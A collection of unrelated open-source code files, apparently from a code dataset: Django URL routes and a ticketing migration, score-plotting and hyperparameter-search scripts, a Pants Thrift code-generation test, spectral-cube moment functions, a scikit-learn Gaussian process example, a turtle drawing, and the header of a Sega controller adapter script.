path("book_place/<int:pk>/update", views.BookPlaceViewSet.as_view({'post': 'update'})),
path("reading_room/", views.ReadingRoomViewSet.as_view({'get': 'list'})),
path("reading_room/<int:pk>/", views.ReadingRoomViewSet.as_view({'get': 'retrieve'})),
path('query1/', views.Query1.as_view()),
path('query5/', views.Query5.as_view()),
]
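# Note: a DRF router (rest_framework.routers.DefaultRouter) registered with
# router.register(r"book", views.BookViewSet), etc., could generate similar
# list/retrieve/create/update/destroy routes automatically; the explicit
# as_view mappings above spell out the same method-to-action binding by hand.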
|
the-stack_106_30538 | from statistics import mean
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from collections import deque
import os
import csv
import numpy as np
NUMBER_RUNS = 17
class ScoreAnalyst:
def __init__(self, nb_runs):
self.nb_runs = nb_runs
self.score_csv_root_path = "scores_"
self.score_csv_ext_path = ".csv"
self.scores_list = [[] for k in range(self.nb_runs)]
self.scores_lengths = [0 for k in range(self.nb_runs)]  # one length per run
self.scores_average_step = []
self.max_length = 0
self.min_length = 0
def make_score_analysis(self):
for i in range(self.nb_runs):
self.get_score_data(i+1)
self.max_length = max(self.scores_lengths)
self.min_length = min(self.scores_lengths)
self.complete_score_datas()
self.scores_average_step = [[] for k in range(self.max_length)]
for j in range (self.max_length):
sum_at_step = 0
for i in range(self.nb_runs):
sum_at_step += self.scores_list[i][j]
self.scores_average_step[j] = sum_at_step/self.nb_runs
avg_score_step_plot_title = "Average score per step over " + str(self.nb_runs) + " runs"
avg_score_step_x_label = "Step"
avg_score_step_y_label = "Average score"
avg_score_step_output_path = "./average_score_step.png"
self.save_list_png(avg_score_step_output_path, self.scores_average_step, avg_score_step_x_label, avg_score_step_y_label, avg_score_step_plot_title)
def get_score_data(self, it):
# Open score file and put it into the scores_list
file_name = self.score_csv_root_path + str(it) + self.score_csv_ext_path
with open(file_name, "r") as scores:
reader = csv.reader(scores)
data = list(reader)
self.scores_lengths[it-1] = len(data)
for i in range(0, len(data)):
self.scores_list[it-1].append(int(data[i][0]))
def complete_score_datas(self):
# Complete score datas until they reach max length with the mean of the last 25
for i in range(len(self.scores_list)):
while len(self.scores_list[i]) < self.max_length:
avg_last_25 = sum(self.scores_list[i][-25:])/25
self.scores_list[i].append(avg_last_25)
def save_list_png(self, output_path, y, x_label, y_label, plot_title):
x = range(len(y))
plt.subplots()
plt.plot(x, y, label="average score per step")
plt.title(plot_title)
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.savefig(output_path, bbox_inches="tight")
plt.close()
if __name__ == "__main__":
score_analyst = ScoreAnalyst(NUMBER_RUNS)
score_analyst.make_score_analysis()
|
the-stack_106_30540 | import copy
import numpy as np
import random as r
import training
params = {}
# settings related to dataset
params['data_name'] = 'SIR'
params['len_time'] = 257
n = 3 # dimension of system (and input layer)
num_initial_conditions = 5000 # per training file
params['delta_t'] = 0.02
# settings related to saving results
params['folder_name'] = 'exp2'
# settings related to network architecture
params['num_real'] = 0
params['num_complex_pairs'] = 1
params['num_evals'] = 2
k = params['num_evals'] # dimension of y-coordinates
# defaults related to initialization of parameters
params['dist_weights'] = 'dl'
params['dist_weights_omega'] = 'dl'
# settings related to loss function
params['num_shifts'] = 30
params['num_shifts_middle'] = params['len_time'] - 1
max_shifts = max(params['num_shifts'], params['num_shifts_middle'])
num_examples = num_initial_conditions * (params['len_time'] - max_shifts)
params['recon_lam'] = .001
params['L1_lam'] = 0.0
params['auto_first'] = 1
# settings related to training
params['num_passes_per_file'] = 1542#15 * 6 * 50
params['num_steps_per_batch'] = 2
params['learning_rate'] = 10 ** (-3)
# settings related to timing
params['max_time'] = 6 * 60 * 60 # 6 hours
params['min_5min'] = .25
params['min_20min'] = .02
params['min_40min'] = .002
params['min_1hr'] = .0002
params['min_2hr'] = .00002
params['min_3hr'] = .000004
params['min_4hr'] = .0000005
params['min_halfway'] = 1
# settings related to LSTM
params['num_LSTM_input_weights'] = 1
params['num_LSTM_hidden_weights'] = 1
params['LSTM_widths'] = [50]
for count in range(200): # loop to do random experiments
params['data_train_len'] = 2 #r.randint(3, 6)
params['batch_size'] = int(2 ** 2)#(r.randint(7, 9)))
steps_to_see_all = num_examples / params['batch_size']
params['num_steps_per_file_pass'] = (int(steps_to_see_all) + 1) * params['num_steps_per_batch']
params['L2_lam'] = 10 ** (-r.randint(13, 14))
params['Linf_lam'] = 10 ** (-r.randint(7, 10))
d = r.randint(1, 2)
if d == 1:
wopts = np.arange(100, 200, 5)
w = wopts[r.randint(0, len(wopts) - 1)]
params['widths'] = [n, w, k, k, w, n]
elif d == 2:
wopts = np.arange(30, 90, 5)
w = wopts[r.randint(0, len(wopts) - 1)]
params['widths'] = [n, w, w, k, k, w, w, n]
do = r.randint(1, 2)
if do == 1:
wopts = np.arange(140, 190, 5)
wo = wopts[r.randint(0, len(wopts) - 1)]
params['hidden_widths_omega'] = [wo, ]
elif do == 2:
wopts = np.arange(10, 55, 5)
wo = wopts[r.randint(0, len(wopts) - 1)]
params['hidden_widths_omega'] = [wo, wo]
training.main_exp(copy.deepcopy(params))
|
the-stack_106_30543 | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import subprocess
from pathlib import Path
from textwrap import dedent
from pex.resolver import resolve
from pants.backend.codegen.thrift.lib.thrift import Thrift
from pants.backend.codegen.thrift.python.apache_thrift_py_gen import ApacheThriftPyGen
from pants.backend.codegen.thrift.python.python_thrift_library import PythonThriftLibrary
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.backend.python.subsystems.python_repos import PythonRepos
from pants.backend.python.targets.python_library import PythonLibrary
from pants.base.build_environment import get_buildroot
from pants.testutil.subsystem.util import global_subsystem_instance
from pants.testutil.task_test_base import TaskTestBase
class ApacheThriftPyGenTest(TaskTestBase):
@classmethod
def task_type(cls):
return ApacheThriftPyGen
@staticmethod
def get_thrift_version(apache_thrift_gen):
thrift = global_subsystem_instance(Thrift).scoped_instance(apache_thrift_gen)
return thrift.get_options().version
def generate_single_thrift_target(self, python_thrift_library):
context = self.context(target_roots=[python_thrift_library])
apache_thrift_gen = self.create_task(context)
apache_thrift_gen.execute()
def is_synthetic_python_library(target):
return isinstance(target, PythonLibrary) and target.is_synthetic
synthetic_targets = context.targets(predicate=is_synthetic_python_library)
self.assertEqual(1, len(synthetic_targets))
return apache_thrift_gen, synthetic_targets[0]
def init_py_path(self, target, package_rel_dir):
return os.path.join(self.build_root, target.target_base, package_rel_dir, '__init__.py')
def assert_ns_package(self, target, package_rel_dir):
with open(self.init_py_path(target, package_rel_dir), 'r') as fp:
self.assertEqual("__import__('pkg_resources').declare_namespace(__name__)",
fp.read().strip())
def assert_leaf_package(self, target, package_rel_dir, *services):
# We know thrift controls exported package symbols using `__all__`; so reading this out of the
# `__init__.py` is enough to show we haven't trampled non-trivial thrift-generated `__init__.py`
# files.
symbols = {}
with open(self.init_py_path(target, package_rel_dir), 'rb') as fp:
exec(fp.read(), symbols)
self.assertIn('__all__', symbols)
self.assertEqual(sorted(('constants', 'ttypes') + services), sorted(symbols['__all__']))
def test_single_namespace(self):
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
const i32 THINGCONSTANT = 42
struct Thing {}
service ThingService {}
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift'])
_, synthetic_target = self.generate_single_thrift_target(one)
self.assertEqual({'foo/__init__.py',
'foo/bar/__init__.py',
'foo/bar/ThingService-remote',
'foo/bar/ThingService.py',
'foo/bar/ttypes.py',
'foo/bar/constants.py'},
set(synthetic_target.sources_relative_to_source_root()))
self.assert_ns_package(synthetic_target, 'foo')
self.assert_leaf_package(synthetic_target, 'foo/bar', 'ThingService')
def test_inserts_unicode_header(self):
"""Test that the thrift compiler inserts utf-8 coding header."""
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
/**
* This comment has a unicode string: 🐈
* That is a cat, and it's used for testing purposes.
* When this is compiled, the thrift compiler should include the "coding=UTF-8".
* at the beginning of the python file.
**/
struct Foo {
1: i64 id,
}(persisted='true')
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift'])
_, synthetic_target = self.generate_single_thrift_target(one)
for filepath in synthetic_target.sources_relative_to_buildroot():
if '__init__' not in filepath:
first_line = Path(get_buildroot(), filepath).read_text().splitlines()[0]
self.assertEqual(first_line, "# -*- coding: utf-8 -*-")
def test_nested_namespaces(self):
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
struct One {}
"""))
self.create_file('src/thrift/com/foo/bar/two.thrift', contents=dedent("""
namespace py foo.bar.baz
struct Two {}
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift', 'bar/two.thrift'])
_, synthetic_target = self.generate_single_thrift_target(one)
self.assertEqual({'foo/__init__.py',
'foo/bar/__init__.py',
'foo/bar/constants.py',
'foo/bar/ttypes.py',
'foo/bar/baz/__init__.py',
'foo/bar/baz/constants.py',
'foo/bar/baz/ttypes.py'},
set(synthetic_target.sources_relative_to_source_root()))
self.assert_ns_package(synthetic_target, 'foo')
self.assert_leaf_package(synthetic_target, 'foo/bar')
self.assert_leaf_package(synthetic_target, 'foo/bar/baz')
def test_namespace_effective(self):
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
struct One {}
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift'])
apache_thrift_gen, synthetic_target_one = self.generate_single_thrift_target(one)
self.create_file('src/thrift2/com/foo/two.thrift', contents=dedent("""
namespace py foo.baz
struct Two {}
"""))
two = self.make_target(spec='src/thrift2/com/foo:two',
target_type=PythonThriftLibrary,
sources=['two.thrift'])
_, synthetic_target_two = self.generate_single_thrift_target(two)
# Confirm separate PYTHONPATH entries, which we need to test namespace packages.
self.assertNotEqual(synthetic_target_one.target_base, synthetic_target_two.target_base)
targets = (synthetic_target_one, synthetic_target_two)
self.context(for_subsystems=[PythonInterpreterCache, PythonRepos])
interpreter_cache = PythonInterpreterCache.global_instance()
python_repos = PythonRepos.global_instance()
interpreter = interpreter_cache.select_interpreter_for_targets(targets)
# We need setuptools to import namespace packages under python 2 (via pkg_resources), so we
# prime the PYTHONPATH with a known good version of setuptools.
# TODO(John Sirois): We really should be emitting setuptools in a
# `synthetic_target_extra_dependencies` override in `ApacheThriftPyGen`:
# https://github.com/pantsbuild/pants/issues/5975
pythonpath = [os.path.join(get_buildroot(), t.target_base) for t in targets]
for resolved_dist in resolve([f'thrift=={self.get_thrift_version(apache_thrift_gen)}',
'setuptools==40.6.3'],
interpreter=interpreter,
context=python_repos.get_network_context(),
fetchers=python_repos.get_fetchers()):
pythonpath.append(resolved_dist.distribution.location)
process = subprocess.Popen([interpreter.binary,
'-c',
'from foo.bar.ttypes import One; from foo.baz.ttypes import Two'],
env={'PYTHONPATH': os.pathsep.join(pythonpath)},
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertEqual(0, process.returncode, stderr)
def test_compatibility_passthrough(self):
py2_thrift_library = self.make_target(spec='src/thrift/com/foo:py2',
target_type=PythonThriftLibrary,
sources=[],
compatibility=['CPython>=2.7,<3'])
_, py2_synthetic_target = self.generate_single_thrift_target(py2_thrift_library)
self.assertEqual(py2_thrift_library.compatibility, py2_synthetic_target.compatibility)
py3_thrift_library = self.make_target(spec='src/thrift/com/foo:py3',
target_type=PythonThriftLibrary,
sources=[],
compatibility=['CPython>=3,<3.7'])
_, py3_synthetic_target = self.generate_single_thrift_target(py3_thrift_library)
self.assertEqual(py3_thrift_library.compatibility, py3_synthetic_target.compatibility)
self.assertNotEqual(py3_synthetic_target.compatibility, py2_synthetic_target.compatibility)
|
the-stack_106_30547 | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Batch',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('create_time', models.DateTimeField(auto_now=True)),
('delivery_time', models.DateTimeField(null=True, blank=True)),
],
options={
'verbose_name': 'toimituser\xe4',
'verbose_name_plural': 'toimituser\xe4t',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('first_name', models.CharField(max_length=100, verbose_name='Etunimi')),
('last_name', models.CharField(max_length=100, verbose_name='Sukunimi')),
('address', models.CharField(max_length=200, verbose_name='Katuosoite')),
('zip_code', models.CharField(max_length=5, verbose_name='Postinumero')),
('city', models.CharField(max_length=30, verbose_name='Postitoimipaikka')),
('email', models.EmailField(help_text='Tarkista s\xe4hk\xf6postiosoite huolellisesti. Tilausvahvistus sek\xe4 mahdolliset s\xe4hk\xf6iset liput l\xe4hetet\xe4\xe4n t\xe4h\xe4n s\xe4hk\xf6postiosoitteeseen.', max_length=75, verbose_name='S\xe4hk\xf6postiosoite')),
('allow_marketing_email', models.BooleanField(default=True, verbose_name='Minulle saa l\xe4hett\xe4\xe4 Traconiin liittyvi\xe4 tiedotteita s\xe4hk\xf6postitse')),
('phone_number', models.CharField(max_length=30, null=True, verbose_name='Puhelinnumero', blank=True)),
],
options={
'verbose_name': 'asiakas',
'verbose_name_plural': 'asiakkaat',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='LimitGroup',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('description', models.CharField(max_length=255, verbose_name='Kuvaus')),
('limit', models.IntegerField(verbose_name='Enimm\xe4ism\xe4\xe4r\xe4')),
],
options={
'verbose_name': 'loppuunmyyntiryhm\xe4',
'verbose_name_plural': 'loppuunmyyntiryhm\xe4t',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('start_time', models.DateTimeField(auto_now_add=True)),
('confirm_time', models.DateTimeField(null=True, verbose_name='Tilausaika', blank=True)),
('ip_address', models.CharField(max_length=15, null=True, verbose_name='Tilaajan IP-osoite', blank=True)),
('payment_date', models.DateField(null=True, verbose_name='Maksup\xe4iv\xe4', blank=True)),
('cancellation_time', models.DateTimeField(null=True, verbose_name='Peruutusaika', blank=True)),
('reference_number', models.CharField(max_length=31, verbose_name='Viitenumero', blank=True)),
('batch', models.ForeignKey(verbose_name='Toimituser\xe4', blank=True, to='tickets.Batch', null=True)),
('customer', models.OneToOneField(null=True, blank=True, to='tickets.Customer')),
],
options={
'verbose_name': 'tilaus',
'verbose_name_plural': 'tilaukset',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OrderProduct',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('count', models.IntegerField(default=0)),
('order', models.ForeignKey(related_name='order_product_set', to='tickets.Order')),
],
options={
'verbose_name': 'tilausrivi',
'verbose_name_plural': 'tilausrivit',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100)),
('internal_description', models.CharField(max_length=255, null=True, blank=True)),
('description', models.TextField()),
('mail_description', models.TextField(null=True, blank=True)),
('price_cents', models.IntegerField()),
('requires_shipping', models.BooleanField(default=True)),
('electronic_ticket', models.BooleanField(default=False)),
('available', models.BooleanField(default=True)),
('notify_email', models.CharField(max_length=100, null=True, blank=True)),
('ordering', models.IntegerField(default=0)),
],
options={
'verbose_name': 'tuote',
'verbose_name_plural': 'tuotteet',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TicketsEventMeta',
fields=[
('event', models.OneToOneField(related_name='ticketseventmeta', primary_key=True, serialize=False, to='core.Event')),
('shipping_and_handling_cents', models.IntegerField(default=0, verbose_name='Toimituskulut (senttej\xe4)')),
('due_days', models.IntegerField(default=14, verbose_name='Maksuaika (p\xe4ivi\xe4)')),
('ticket_sales_starts', models.DateTimeField(null=True, verbose_name='Lipunmyynnin alkuaika', blank=True)),
('ticket_sales_ends', models.DateTimeField(null=True, verbose_name='Lipunmyynnin p\xe4\xe4ttymisaika', blank=True)),
('reference_number_template', models.CharField(default='{:04d}', help_text='Paikkamerkin {} kohdalle sijoitetaan tilauksen numero. Nollilla t\xe4ytt\xe4minen esim. {:04d} (4 merkin leveydelt\xe4).', max_length=31, verbose_name='Viitenumeron formaatti')),
('contact_email', models.CharField(help_text='Ongelmatilanteissa k\xe4ytt\xe4j\xe4\xe4 kehotetaan ottamaan yhteytt\xe4 t\xe4h\xe4n osoitteeseen. Muoto: Tracon 9 -lipunmyynti <[email protected]>', max_length=255, verbose_name='Asiakaspalvelun s\xe4hk\xf6postiosoite selitteineen', blank=True)),
('plain_contact_email', models.CharField(help_text='Ongelmatilanteissa k\xe4ytt\xe4j\xe4\xe4 kehotetaan ottamaan yhteytt\xe4 t\xe4h\xe4n osoitteeseen. Muoto: [email protected]', max_length=255, verbose_name='Asiakaspalvelun s\xe4hk\xf6postiosoite ilman selitett\xe4', blank=True)),
('ticket_spam_email', models.CharField(help_text='Kaikki j\xe4rjestelm\xe4n l\xe4hett\xe4m\xe4t s\xe4hk\xf6postiviestit l\xe4hetet\xe4\xe4n my\xf6s t\xe4h\xe4n osoitteeseen.', max_length=255, verbose_name='Tarkkailus\xe4hk\xf6posti', blank=True)),
('reservation_seconds', models.IntegerField(default=1800, help_text='K\xe4ytt\xe4j\xe4ll\xe4 on t\xe4m\xe4n verran aikaa siirty\xe4 maksamaan ja maksaa tilauksensa tai tilaus perutaan.', verbose_name='Varausaika (sekuntia)')),
('ticket_free_text', models.TextField(help_text='T\xe4m\xe4 teksti tulostetaan E-lippuun.', verbose_name='E-lipun teksti', blank=True)),
('admin_group', models.ForeignKey(to='auth.Group')),
],
options={
'verbose_name': 'tapahtuman lipunmyyntiasetukset',
'verbose_name_plural': 'tapahtuman lipunmyyntiasetukset',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='product',
name='event',
field=models.ForeignKey(to='core.Event'),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='limit_groups',
field=models.ManyToManyField(to='tickets.LimitGroup', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='orderproduct',
name='product',
field=models.ForeignKey(related_name='order_product_set', to='tickets.Product'),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='event',
field=models.ForeignKey(to='core.Event'),
preserve_default=True,
),
migrations.AddField(
model_name='limitgroup',
name='event',
field=models.ForeignKey(verbose_name='Tapahtuma', to='core.Event'),
preserve_default=True,
),
migrations.AddField(
model_name='batch',
name='event',
field=models.ForeignKey(to='core.Event'),
preserve_default=True,
),
]
|
the-stack_106_30550 | from __future__ import print_function, absolute_import, division
import numpy as np
from .cube_utils import iterator_strategy
from .np_compat import allbadtonan
"""
Functions to compute moment maps in a variety of ways
"""
def _moment_shp(cube, axis):
"""
Return the shape of the moment map
Parameters
-----------
cube : SpectralCube
The cube to collapse
axis : int
The axis to collapse along (numpy convention)
Returns
-------
ny, nx
"""
return cube.shape[:axis] + cube.shape[axis + 1:]
def _slice0(cube, axis):
"""
0th moment along an axis, calculated slicewise
Parameters
----------
cube : SpectralCube
axis : int
Returns
-------
moment0 : array
"""
shp = _moment_shp(cube, axis)
result = np.zeros(shp)
view = [slice(None)] * 3
valid = np.zeros(shp, dtype=bool)
for i in range(cube.shape[axis]):
view[axis] = i
plane = cube._get_filled_data(fill=np.nan, view=tuple(view))
valid |= np.isfinite(plane)
result += np.nan_to_num(plane) * cube._pix_size_slice(axis)
result[~valid] = np.nan
return result
def _slice1(cube, axis):
"""
1st moment along an axis, calculated slicewise
Parameters
----------
cube : SpectralCube
axis : int
Returns
-------
moment1 : array
"""
shp = _moment_shp(cube, axis)
result = np.zeros(shp)
view = [slice(None)] * 3
pix_size = cube._pix_size_slice(axis)
pix_cen = cube._pix_cen()[axis]
weights = np.zeros(shp)
for i in range(cube.shape[axis]):
view[axis] = i
plane = cube._get_filled_data(fill=0, view=tuple(view))
result += (plane *
pix_cen[tuple(view)] *
pix_size)
weights += plane * pix_size
return result / weights
def moment_slicewise(cube, order, axis):
"""
Compute moments by accumulating the result 1 slice at a time
"""
if order == 0:
return _slice0(cube, axis)
if order == 1:
return _slice1(cube, axis)
shp = _moment_shp(cube, axis)
result = np.zeros(shp)
view = [slice(None)] * 3
pix_size = cube._pix_size_slice(axis)
pix_cen = cube._pix_cen()[axis]
weights = np.zeros(shp)
# would be nice to get mom1 and momn in single pass over data
# possible for mom2, not sure about general case
mom1 = _slice1(cube, axis)
for i in range(cube.shape[axis]):
view[axis] = i
plane = cube._get_filled_data(fill=0, view=tuple(view))
result += (plane *
(pix_cen[tuple(view)] - mom1) ** order *
pix_size)
weights += plane * pix_size
return (result / weights)
def moment_raywise(cube, order, axis):
"""
Compute moments by accumulating the answer one ray at a time
"""
shp = _moment_shp(cube, axis)
out = np.zeros(shp) * np.nan
pix_cen = cube._pix_cen()[axis]
pix_size = cube._pix_size_slice(axis)
for x, y, slc in cube._iter_rays(axis):
# the intensity, i.e. the weights
include = cube._mask.include(data=cube._data, wcs=cube._wcs, view=slc,
wcs_tolerance=cube._wcs_tolerance)
if not include.any():
continue
data = cube.flattened(slc).value * pix_size
if order == 0:
out[x, y] = data.sum()
continue
order1 = (data * pix_cen[slc][include]).sum() / data.sum()
if order == 1:
out[x, y] = order1
continue
ordern = (data * (pix_cen[slc][include] - order1) ** order).sum()
ordern /= data.sum()
out[x, y] = ordern
return out
def moment_cubewise(cube, order, axis):
"""
Compute the moments by working with the entire data at once
"""
pix_cen = cube._pix_cen()[axis]
data = cube._get_filled_data() * cube._pix_size_slice(axis)
if order == 0:
return allbadtonan(np.nansum)(data, axis=axis)
if order == 1:
return (np.nansum(data * pix_cen, axis=axis) /
np.nansum(data, axis=axis))
else:
mom1 = moment_cubewise(cube, 1, axis)
# insert an axis so it broadcasts properly
shp = list(_moment_shp(cube, axis))
shp.insert(axis, 1)
mom1 = mom1.reshape(shp)
return (np.nansum(data * (pix_cen - mom1) ** order, axis=axis) /
np.nansum(data, axis=axis))
def moment_auto(cube, order, axis):
"""
Build a moment map, choosing a strategy to balance speed and memory.
"""
strategy = dict(cube=moment_cubewise, ray=moment_raywise,
slice=moment_slicewise)
return strategy[iterator_strategy(cube, axis)](cube, order, axis)
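# Minimal usage sketch (hypothetical; in the spectral_cube package these helpers are
# normally reached through SpectralCube.moment rather than called directly):
#
#   mom0 = moment_auto(cube, order=0, axis=0)  # integrated-intensity map
#   mom1 = moment_auto(cube, order=1, axis=0)  # intensity-weighted mean coordinate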
|
the-stack_106_30552 | """
=============================================================
Gaussian process regression (GPR) with noise-level estimation
=============================================================
This example shows the ability of the
:class:`~sklearn.gaussian_process.kernels.WhiteKernel` to estimate the noise
level in the data. Moreover, we show the importance of kernel hyperparameters
initialization.
"""
# Authors: Jan Hendrik Metzen <[email protected]>
# Guillaume Lemaitre <[email protected]>
# License: BSD 3 clause
# %%
# Data generation
# ---------------
#
# We will work in a setting where `X` will contain a single feature. We create a
# function that will generate the target to be predicted. We will add an
# option to add some noise to the generated target.
import numpy as np
def target_generator(X, add_noise=False):
target = 0.5 + np.sin(3 * X)
if add_noise:
rng = np.random.RandomState(1)
target += rng.normal(0, 0.3, size=target.shape)
return target.squeeze()
# %%
# Let's have a look at the target generator without adding any noise, to
# observe the signal that we would like to predict.
X = np.linspace(0, 5, num=30).reshape(-1, 1)
y = target_generator(X, add_noise=False)
# %%
import matplotlib.pyplot as plt
plt.plot(X, y, label="Expected signal")
plt.legend()
plt.xlabel("X")
_ = plt.ylabel("y")
# %%
# The target transforms the input `X` using a sine function. Now, we will
# generate a few noisy training samples. To illustrate the noise level, we will
# plot the true signal together with the noisy training samples.
rng = np.random.RandomState(0)
X_train = rng.uniform(0, 5, size=20).reshape(-1, 1)
y_train = target_generator(X_train, add_noise=True)
# %%
plt.plot(X, y, label="Expected signal")
plt.scatter(
x=X_train[:, 0],
y=y_train,
color="black",
alpha=0.4,
label="Observations",
)
plt.legend()
plt.xlabel("X")
_ = plt.ylabel("y")
# %%
# Optimisation of kernel hyperparameters in GPR
# ---------------------------------------------
#
# Now, we will create a
# :class:`~sklearn.gaussian_process.GaussianProcessRegressor`
# using an additive kernel adding a
# :class:`~sklearn.gaussian_process.kernels.RBF` and
# :class:`~sklearn.gaussian_process.kernels.WhiteKernel` kernels.
# The :class:`~sklearn.gaussian_process.kernels.WhiteKernel` is a kernel that
# will be able to estimate the amount of noise present in the data, while the
# :class:`~sklearn.gaussian_process.kernels.RBF` will serve to fit the
# non-linearity between the data and the target.
#
# However, we will show that the hyperparameter space contains several local
# minima. This highlights the importance of the initial hyperparameter values.
#
# We will create a model using a kernel with a high noise level and a large
# length scale, which will explain all variations in the data by noise.
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF, WhiteKernel
kernel = 1.0 * RBF(length_scale=1e1, length_scale_bounds=(1e-2, 1e3)) + WhiteKernel(
noise_level=1, noise_level_bounds=(1e-5, 1e1)
)
gpr = GaussianProcessRegressor(kernel=kernel, alpha=0.0)
gpr.fit(X_train, y_train)
y_mean, y_std = gpr.predict(X, return_std=True)
# %%
plt.plot(X, y, label="Expected signal")
plt.scatter(x=X_train[:, 0], y=y_train, color="black", alpha=0.4, label="Observations")
plt.errorbar(X, y_mean, y_std)
plt.legend()
plt.xlabel("X")
plt.ylabel("y")
_ = plt.title(
f"Initial: {kernel}\nOptimum: {gpr.kernel_}\nLog-Marginal-Likelihood: "
f"{gpr.log_marginal_likelihood(gpr.kernel_.theta)}",
fontsize=8,
)
# %%
# We see that the optimum kernel found still has a high noise level and
# an even larger length scale. Furthermore, we observe that the
# model does not provide faithful predictions.
#
# Now, we will initialize the
# :class:`~sklearn.gaussian_process.kernels.RBF` with a
# smaller `length_scale` value and the
# :class:`~sklearn.gaussian_process.kernels.WhiteKernel`
# with a smaller noise level lower bound.
kernel = 1.0 * RBF(length_scale=1e-1, length_scale_bounds=(1e-2, 1e3)) + WhiteKernel(
noise_level=1e-2, noise_level_bounds=(1e-10, 1e1)
)
gpr = GaussianProcessRegressor(kernel=kernel, alpha=0.0)
gpr.fit(X_train, y_train)
y_mean, y_std = gpr.predict(X, return_std=True)
# %%
plt.plot(X, y, label="Expected signal")
plt.scatter(x=X_train[:, 0], y=y_train, color="black", alpha=0.4, label="Observations")
plt.errorbar(X, y_mean, y_std)
plt.legend()
plt.xlabel("X")
plt.ylabel("y")
_ = plt.title(
f"Initial: {kernel}\nOptimum: {gpr.kernel_}\nLog-Marginal-Likelihood: "
f"{gpr.log_marginal_likelihood(gpr.kernel_.theta)}",
fontsize=8,
)
# %%
# First, we see that the model's predictions are more precise than the
# previous model's: this new model is able to estimate the noise-free
# functional relationship.
#
# Looking at the kernel hyperparameters, we see that the best combination found
# has a smaller noise level and shorter length scale than the first model.
#
# We can inspect the Log-Marginal-Likelihood (LML) of
# :class:`~sklearn.gaussian_process.GaussianProcessRegressor`
# for different hyperparameters to get a sense of the local minima.
from matplotlib.colors import LogNorm
length_scale = np.logspace(-2, 4, num=50)
noise_level = np.logspace(-2, 1, num=50)
length_scale_grid, noise_level_grid = np.meshgrid(length_scale, noise_level)
log_marginal_likelihood = [
gpr.log_marginal_likelihood(theta=np.log([0.36, scale, noise]))
for scale, noise in zip(length_scale_grid.ravel(), noise_level_grid.ravel())
]
log_marginal_likelihood = np.reshape(
log_marginal_likelihood, newshape=noise_level_grid.shape
)
# %%
vmin, vmax = (-log_marginal_likelihood).min(), 50
level = np.around(np.logspace(np.log10(vmin), np.log10(vmax), num=50), decimals=1)
plt.contour(
length_scale_grid,
noise_level_grid,
-log_marginal_likelihood,
levels=level,
norm=LogNorm(vmin=vmin, vmax=vmax),
)
plt.colorbar()
plt.xscale("log")
plt.yscale("log")
plt.xlabel("Length-scale")
plt.ylabel("Noise-level")
plt.title("Log-marginal-likelihood")
plt.show()
# %%
# We see that there are two local minima that correspond to the combination
# of hyperparameters previously found. Depending on the initial values for the
# hyperparameters, the gradient-based optimization might or might not converge
# to the best model. It is thus important to repeat the optimization
# several times for different initializations.
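# %%
# One simple way to make the result less dependent on a single starting point
# is to restart the hyperparameter optimization from several random
# initializations drawn within the kernel bounds. The sketch below reuses the
# last kernel definition; the number of restarts is an arbitrary choice.
gpr = GaussianProcessRegressor(kernel=kernel, alpha=0.0, n_restarts_optimizer=9)
gpr.fit(X_train, y_train)
print(f"Optimum kernel with restarts: {gpr.kernel_}")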
|
the-stack_106_30553 | # Program to draw Spider Web using Turtle
import turtle
t = turtle.Pen()
colors=['red', 'blue', 'yellow', 'green', 'cyan', 'magenta']
turtle.bgcolor('black')
for i in range(190):
t.pencolor(colors[i%6])
t.width(2)
t.forward(i)
t.right(30)
|
the-stack_106_30554 | # code.py for PiPicoUSBSegaController - https://github.com/thinghacker/PiPicoUSBSegaController
#
# This is a very simple project to take a Raspberry Pi Pico and turn it into a USB joystick adapter for a 3 or 6 Button Sega Genesis/Megadrive Controller using CircuitPython.
#
# References used while developing this:
# Circuit Python USB Gamepad concept - https://signal11.wordpress.com/tag/flight-simulation/
# Sega Controller State Machine - https://www.raspberryfield.life/2019/03/25/sega-mega-drive-genesis-6-button-xyz-controller/
# HID Descriptor for 8 Buttons and Dpad from an arduino pro micro version of this - https://github.com/thinghacker/DualUSBSegaController/blob/master/examples/DualUSBSegaController/DualUSBSegaController.ino
#
